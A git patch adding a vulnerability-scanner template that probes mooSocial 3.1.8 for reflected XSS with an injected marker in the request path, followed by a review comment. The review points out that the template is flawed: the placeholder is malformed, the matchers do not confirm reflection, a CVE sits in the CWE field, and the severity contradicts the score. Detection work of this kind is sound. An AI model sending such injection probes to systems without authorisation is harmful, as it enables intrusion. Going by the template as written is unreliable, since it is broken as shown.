From 99f32ed1028dcab8b8c94dc6b6c6de7d6ed6973c Mon Sep 17 00:00:00 2001
From: momika233 <56291820+momika233@users.noreply.github.com>
Date: Wed, 16 Aug 2023 00:09:48 +0800
Subject: [PATCH] Add files via upload
---
http/vulnerabilities/mooSocial-xss.yaml | 39 +++++++++++++++++++++++++
1 file changed, 39 insertions(+)
create mode 100644 http/vulnerabilities/mooSocial-xss.yaml
diff --git a/http/vulnerabilities/mooSocial-xss.yaml b/http/vulnerabilities/mooSocial-xss.yaml
new file mode 100644
index 0000000000..398029077e
--- /dev/null
+++ b/http/vulnerabilities/mooSocial-xss.yaml
@@ -0,0 +1,39 @@
+id: mooSocial-xss
+
+info:
+ name: mooSocial 3.1.8 - Reflected XSS
+ author: momika233
+ severity: high
+ description: |
+ The attacker can send to victim a link containing a malicious URL in an email or instant message,can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+ reference:
+ - https://www.exploit-db.com/exploits/51670
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 3.5
+ cwe-id: CVE-2023-4173
+ metadata:
+ max-request: 1
+ verified: true
+ fofa-query: "mooSocial"
+ tags: mooSocial,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}/classifiedsmomika233\">momika233/search?category=1"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"text":"'
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
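Review bot: The request path is written `"{{BaseURL}/classifieds…` with only one closing brace, so the placeholder is most likely never expanded and the check cannot reach the host under test; it should start `"{{BaseURL}}/classifieds…`. The matchers accept any 200 response with a `text/html` header whose body contains `"text":"`, which does not show that the marker from the path was reflected unescaped, so patched or unrelated sites can match. Add a body word matcher on the reflected `momika233">momika233` string so that a hit means the output really was unencoded. In `classification`, a CVE identifier sits in the CWE field (`cwe-id: CVE-2023-4173`); this should be `cve-id: CVE-2023-4173` with `cwe-id: CWE-79`. Also, `severity: high` contradicts the stated `cvss-score: 3.5`, so one of the two needs correcting before triage tooling consumes it.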